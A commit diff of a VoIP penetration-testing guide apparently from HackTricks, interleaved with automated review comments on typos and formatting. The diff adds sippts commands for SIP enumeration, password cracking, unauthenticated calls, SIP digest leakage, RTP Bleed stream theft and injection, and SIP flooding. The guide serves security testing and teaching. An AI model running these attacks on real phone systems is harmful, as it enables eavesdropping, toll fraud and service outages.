GITBOOK-3881: change request with no subject merged in GitBook

This commit is contained in:
CPol 2023-04-23 19:20:09 +00:00 committed by gitbook-bot
parent a9e2d3b784
commit 05b150f7d2
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF


@ -83,15 +83,15 @@ Any other OSINT enumeration that helps to identify VoIP software being used will
```bash
# Use --fp to fingerprint the services
svmap 192.168.1.0/24 -p 5060-5070 [--fp]
svmap 10.10.0.0/24 -p 5060-5070 [--fp]
```
* **`sipscan.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipscan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithread and can scan large ranges of networks. It allows to easily indicate a port range, scan both TCP & UDP, use another method (by default it will use OPTIONS) and specify a different User-Agent (and more).
```bash
./sipscan.py -i 192.168.2.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
./sipscan.py -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
[!] IP/Network: 192.168.2.0/24
[!] IP/Network: 10.10.0.0/24
[!] Port range: 5060-5080
[!] Protocol: UDP, TCP, TLS
[!] Method to scan: REGISTER
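Review bot: the sipscan sample output (`[!] IP/Network ...` through `[!] Method to scan: REGISTER`) sits in the same bash fence as the command at `./sipscan.py -i 10.10.0.0/24 ...`, so a reader copying the block pastes the output lines as commands; either put the output in its own fence or prefix those lines with `#`. The printed `Method to scan: REGISTER` also only matches the command when the bracketed `[-m REGISTER]` is actually passed, since the text above says the default method is OPTIONS; dropping the brackets in the command (or changing the sample output to OPTIONS) keeps the two consistent. The address change to `10.10.0.0/24` is applied consistently in this hunk.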
@ -120,6 +120,14 @@ The PBX could also be exposing other network services such as:
* **5432 (PostgreSQL)**: PostgreSQL database
* And others...
### Methods Enumeration
It's possible to find **which methods are available** to use in the PBX using `sipenumerate.py` from [**sippts**](https://github.com/Pepelux/sippts)
```bash
python3 sipenumerate.py -i 10.10.0.10 -r 5080
```
### Extension Enumeration
Extensions in a PBX (Private Branch Exchange) system refer to the **unique internal identifiers assigned to individual** phone lines, devices, or users within an organization or business. Extensions make it possible to **route calls within the organization efficiently**, without the need for individual external phone numbers for each user or device.
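Review bot: the new "Methods Enumeration" section names the tool but never says what result to look for or how the methods are learned; a SIP server advertises the methods it accepts in the `Allow` header of its response (RFC 3261), so one sentence saying that `sipenumerate.py` reports that header, and that a server answering without an `Allow` header should be probed per method, would make the section actionable. Also, `-r 5080` here differs from the `-p 5060-5070` / `-p5060` used in the neighbouring svmap and svwar examples; pick one port for the running example or note that 5080 is a non-default port chosen for the lab.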
@ -127,13 +135,13 @@ Extensions in a PBX (Private Branch Exchange) system refer to the **unique inter
* **`svwar`** from SIPVicious (`sudo apt install sipvicious`): `svwar` is a free SIP PBX extension line scanner. In concept it works similar to traditional wardialers by **guessing a range of extensions or a given list of extensions**.
```bash
svwar 192.168.1.15 -p5060 -e100-300 -m REGISTER
svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
```
* **`sipextend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipexten identifies extensions on a SIP server. Sipexten can check large network and port ranges.
```bash
python3 sipexten.py -i 192.168.2.203 -r 5080 -e 100-200
python3 sipexten.py -i 10.10.0.10 -r 5080 -e 100-200
```
* **metasploit**: You can also enumerate extensions/usernames with metasploit:
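Review bot: the bullet at `* **`sipextend.py`** from ... Sipexten identifies extensions` names the script `sipextend.py`, but the command two lines below runs `python3 sipexten.py -i 10.10.0.10 -r 5080 -e 100-200` and the description calls it Sipexten; since this line is being edited anyway, rename the bold label to `sipexten.py` so the link text matches the invocation. The svwar and sipexten address changes to `10.10.0.10` are consistent with the rest of the change request.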
@ -146,8 +154,8 @@ auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UD
* **`enumiax` (`apt install enumiax`): enumIAX** is an Inter Asterisk Exchange protocol **username brute-force enumerator**. enumIAX may operate in two distinct modes; Sequential Username Guessing or Dictionary Attack.
```bash
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.1 # Use dictionary
enumiax -v -m3 -M3 192.168.1.1
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary
enumiax -v -m3 -M3 10.10.0.10
```
## VoIP Attacks
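Review bot: the second enumiax command, `enumiax -v -m3 -M3 10.10.0.10`, has no comment while the dictionary line does; the text above says the tool has two modes, so a trailing `# Sequential guessing, usernames of length 3` comment (matching the `-m`/`-M` minimum and maximum length switches) would show the reader which mode this line exercises. The IP substitution itself is fine.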
@ -173,7 +181,7 @@ svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
{% code overflow="wrap" %}
```bash
python3 siprcrack.py -i 192.168.2.203 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt
python3 siprcrack.py -i 10.10.0.10 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt
```
{% endcode %}
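Review bot: the context line of this hunk still reads `svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions` while every other example in the change request was moved to `10.10.0.10`; update that svcrack line too, otherwise the cracking section mixes two lab addresses and the `siprcrack.py -i 10.10.0.10 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt` line below it reads as if it targets a different host.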
@ -225,7 +233,7 @@ It's possible to send these codes in **INFO SIP messages**, in **audio** or insi
multimon -a DTMF -t wac pin.wav
```
### Asterisks Connections Misconfigurations
### Free Calls / Asterisks Connections Misconfigurations
In Asterisk it's possible to allow a connection **from an specific IP address** or from **any IP address**:
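Review bot: the renamed heading `### Free Calls / Asterisks Connections Misconfigurations` carries over the "Asterisks" typo from the old heading; the product is "Asterisk" (the following sentence spells it correctly), so fix it while the heading is being rewritten. The same sentence, `allow a connection **from an specific IP address**`, should read "from a specific IP address".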
@ -257,7 +265,7 @@ For example, this configuration would be vulnerable:\
`type=friend`
{% endhint %}
### Asterisks Context Misconfigurations
### Free Calls / Asterisks Context Misconfigurations
In Asterisk a **context** is a named container or section in the dial plan that **groups together related extensions, actions, and rules**. The dial plan is the core component of an Asterisk system, as it defines **how incoming and outgoing calls are handled and routed**. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system.
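Review bot: same typo as the previous hunk, `### Free Calls / Asterisks Context Misconfigurations` should be "Asterisk Context Misconfigurations"; since the body text spells the project name correctly, the heading is the only place it is wrong. Also "Free Calls / ..." is now used as a prefix on three headings; a reader scanning the table of contents would be better served by one "Free Calls" parent section with these as subsections, but that is a larger restructuring than this change request attempts.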
@ -308,14 +316,14 @@ Moreover, by default the **`sip.conf`** file contains **`allowguest=true`**, the
{% code overflow="wrap" %}
```bash
# Trying to make a call to the number 555555555 (without auth) with source number 200.
python3 sipinvite.py -i 192.168.0.1 -fu 200 -tu 555555555 -v
python3 sipinvite.py -i 10.10.0.10 -fu 200 -tu 555555555 -v
# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
python3 sipinvite.py -i 192.168.0.1 -tu 555555555 -t 444444444
python3 sipinvite.py -i 10.10.0.10 -tu 555555555 -t 444444444
```
{% endcode %}
### Misconfigured IVRS
### Free calls / Misconfigured IVRS
IVRS stands for **Interactive Voice Response System**, a telephony technology that allows users to interact with a computerized system through voice or touch-tone inputs. IVRS is used to build **automated call handling** systems that offer a range of functionalities, such as providing information, routing calls, and capturing user input.
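Review bot: the new heading `### Free calls / Misconfigured IVRS` uses lowercase "calls" while the two headings renamed in the earlier hunks use "Free Calls"; make the capitalisation consistent across the three. In the sipinvite block, the first comment says the call is made "with source number 200" but the second command `python3 sipinvite.py -i 10.10.0.10 -tu 555555555 -t 444444444` omits `-fu`; a short note on what caller identity the tool uses when `-fu` is absent would keep the two examples from reading as if they differ only in the transfer target.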
@ -364,6 +372,43 @@ exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
Therefore, a call to the extension **`101`** and **`123123123`** will be send and only the first one getting the call would be stablished... but if an attacker use an **extension that bypasses any match** that is being performed but doesn't exist, he could be **inject a call only to the desired number**.
## SIPDigestLeak
The SIP Digest Leak is a vulnerability that affects a large number of SIP Phones, including both hardware and software IP Phones as well as phone adapters (VoIP to analogue). The vulnerability allows **leakage of the Digest authentication response**, which is computed from the password. An **offline password attack is then possible** and can recover most passwords based on the challenge response.
Vulnerability scenario (for [**more information check this**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf)):
1. An IP Phone (victim) is listening on port 5060, accepting phone calls
2. The attacker sends an INVITE to the IP Phone
3. The victim phone starts ringing and someone picks up and hangs up (because no one answers the phone at the other end)
4. When the phone is hung up, the **victim phone sends a BYE to the attacker**
5. The **attacker issues a 407 response** that **asks for authentication** and issues an authentication challenge
6. The **victim phone provides a response to the authentication challenge** in a second BYE
7. The **attacker can then issue a brute-force attack** on the challenge response on his local machine (or distributed network etc) and guess the password
* **sipdigestleak.py** from [**sippts**](https://github.com/Pepelux/sippts)**:** SipDigestLeak exploits this vulnerability.
```bash
python3 sipdigestleak.py -i 10.10.0.10
[!] Target: 10.10.0.10:5060/UDP
[!] Caller: 100
[!] Callee: 100
[=>] Request INVITE
[<=] Response 100 Trying
[<=] Response 180 Ringing
[<=] Response 200 OK
[=>] Request ACK
... waiting for BYE ...
[<=] Received BYE
[=>] Request 407 Proxy Authentication Required
[<=] Received BYE with digest
[=>] Request 200 Ok
Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5
```
### Click2Call
Click2Call allows a **web user** (who for example might be interested in a product) to **introduce** his **telephone number** to get called. Then a commercial will be called, and when he **picks up the phone** the user will be **called and connected with the agent**.
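Review bot: step 3 of the scenario, "The victim phone starts ringing and someone picks up and hangs up (because no one answers the phone at the other end)", contradicts itself as written: it is the victim who answers and, hearing nothing from the attacker's side, hangs up. Reword to something like "someone at the victim phone picks up and, since the attacker sends no audio, hangs up", which is what makes step 4 (the victim sends the BYE) follow. Two smaller points: `## SIPDigestLeak` is a level-2 heading while the neighbouring `### Click2Call` and the other attack sections are level-3, so this section will appear as a sibling of "VoIP Attacks" in the generated navigation; and the sample output line `[=>] Request 407 Proxy Authentication Required` labels a response as a request, which is the tool's own output and can stay, but a comment that the 407 is the attacker's reply to the BYE would stop readers from taking it as a typo.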
@ -420,6 +465,42 @@ You could also even make Asterisk **execute a script that will leak the call** w
exten => h,1,System(/tmp/leak_conv.sh &)
```
### RTCPBleed
**RTCPBleed** is a major security issue affecting Asterisk-based VoIP servers (published in 2017). The vulnerability allows **RTP (Real Time Protocol) traffic**, which carries VoIP conversations, to be **intercepted and redirected by anyone on the Internet**. This occurs because RTP traffic bypasses authentication when navigating through NAT (Network Address Translation) firewalls.
RTP proxies try to address **NAT limitations** affecting RTC systems by proxying RTP streams between two or more parties. When NAT is in place, the RTP proxy software often cannot rely on the RTP IP and port information retrieved through signalling (e.g. SIP). Therefore, a number of RTP proxies have implemented a mechanism where such **IP and port tuplet is learned automatically**. This is often done by by inspecting incoming RTP traffic and marking the source IP and port for any incoming RTP traffic as the one that should be responded to. This mechanism, which may be called "learning mode", **does not make use of any sort of authentication**. Therefore **attackers** may **send RTP traffic to the RTP proxy** and receive the proxied RTP traffic meant to be for the caller or callee of an ongoing RTP stream. We call this vulnerability RTP Bleed because it allows attackers to receive RTP media streams meant to be sent to legitimate users.
Another interesting behaviour of RTP proxies and RTP stacks is that sometimes, **even if not vulnerable to RTP Bleed**, they will **accept, forward and/or process RTP packets from any source**. Therefore attackers can send RTP packets which may allow them to inject their media instead of the legitimate one. We call this attack RTP injection because it allows injection of illegitimate RTP packets into existent RTP streams. This vulnerability may be found in both RTP proxies and endpoints.
Asterisk and FreePBX have traditionally used the **`NAT=yes` setting**, which enables RTP traffic to bypass authentication, potentially leading to no audio or one-way audio on calls.
For more info check [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
* **`rtpbleed.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** It detects the RTP Bleed vulnerability sending RTP streams
```bash
python3 rtpbleed.py -i 10.10.0.10
```
* **`rtcpbleed.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** It detects the RTP Bleed vulnerability sending RTP streams
```bash
python3 rtcpbleed.py -i 10.10.0.10
```
* **`rtpbleedflood.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Exploit the RTP Bleed vulnerability sending RTP streams
```bash
python3 rtpbleedflood.py -i 10.10.0.10 -p 10070 -v
```
* **`rtpbleedinject.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Exploit the RTP Bleed vulnerability sending RTP streams (from an audio file)
```bash
python3 rtpbleedinject.py -i 10.10.0.10 -p 10070 -f audio.wav
```
### RCE
In Asterisk you somehow manage to be able to **add extension rules and reload them** (for example by compromising a vulnerable web manager server), it's possible to get RCE using the **`System`** command.
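Review bot: the heading `### RTCPBleed` does not match the body, which describes RTP Bleed (and links rtpbleed.com); both RTP Bleed and the RTCP variant are covered by the tools listed, so name the section "RTP Bleed / RTCP Bleed" or similar. The bullets for `rtpbleed.py` and `rtcpbleed.py` carry the identical description "It detects the RTP Bleed vulnerability sending RTP streams"; the second should say it probes the RTCP port with RTCP packets, otherwise there is no reason for the reader to run both. The sentence "Asterisk and FreePBX have traditionally used the **`NAT=yes` setting**, which enables RTP traffic to bypass authentication, potentially leading to no audio or one-way audio on calls" reads as if `NAT=yes` causes one-way audio, whereas one-way audio behind NAT is the problem that setting (and its learning mode) exists to work around, at the cost of the unauthenticated source learning described two paragraphs above; reword so cause and effect are not inverted. Finally, the flood and inject examples pass `-p 10070` without saying where that RTP port comes from; note that it must be taken from the SDP of an observed call, as the rtpflood bullet further down already does.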
@ -458,17 +539,27 @@ Or you could use the scripts from [http://blog.pepelux.org/2011/09/13/inyectando
There are several ways to try to achieve DoS in VoIP servers.
* **`sipflood.py`** from [**sippts**](https://github.com/Pepelux/sippts)**: **_**SipFlood**_ sends unlimited messages to the target
* `python3 sipflood.py -i 10.10.0.10 -r 5080 -m invite -v`
* [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protocol used by Asterisk
* [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): A tool to perform SIP/SDP INVITE message flooding over UDP/IP.
* [**rtpflood**](https://www.kali.org/tools/rtpflood/): Send several well formed RTP packets. Its needed to know the RTP ports that are being used (sniff first).
* [**SIPp**](https://github.com/SIPp/sipp): Allows to analyze and generate SIP traffic. so it can be used to DoS also.
* [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP swiss army knife. Can also be used to perform SIP attacks.
* Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/), [**voiper**](https://github.com/gremwell/voiper).
* **`sipsend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPSend allow us to send a **customized SIP message** and analyze the response.
* **`wssend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** WsSend allow us to send a customized SIP message over WebSockets and analyze the response.
### OS Vulnerabilities
The easiest way to install a software such as Asterisk is to download an **OS distribution** that has it already installed, such as: **FreePBX, Elastix, Trixbox**... The problem with those is that once it's working sysadmins might **not update them again** and **vulnerabilities** are going to be discovered with time.
## References
* [https://github.com/Pepelux/sippts/wiki](https://github.com/Pepelux/sippts/wiki)
* [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
* [https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4](https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
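Review bot: the two new bullets `sipsend.py` ("send a customized SIP message and analyze the response") and `wssend.py` (the same over WebSockets) are placed under the DoS list, but neither is a flooding tool; they belong with the enumeration or fuzzing entries, or under a separate "Other tools" item, so the DoS section is not padded with generic message crafters. The `sipflood.py` bullet is fine, but its command `python3 sipflood.py -i 10.10.0.10 -r 5080 -m invite -v` is given inline while every other tool on the page uses a fenced bash block; use the same fence style for consistency. While in this hunk: the pre-existing rtpflood line "Its needed to know the RTP ports" should read "It's needed", and the references list now includes rtpbleed.com, which matches the link added in the new RTP Bleed section.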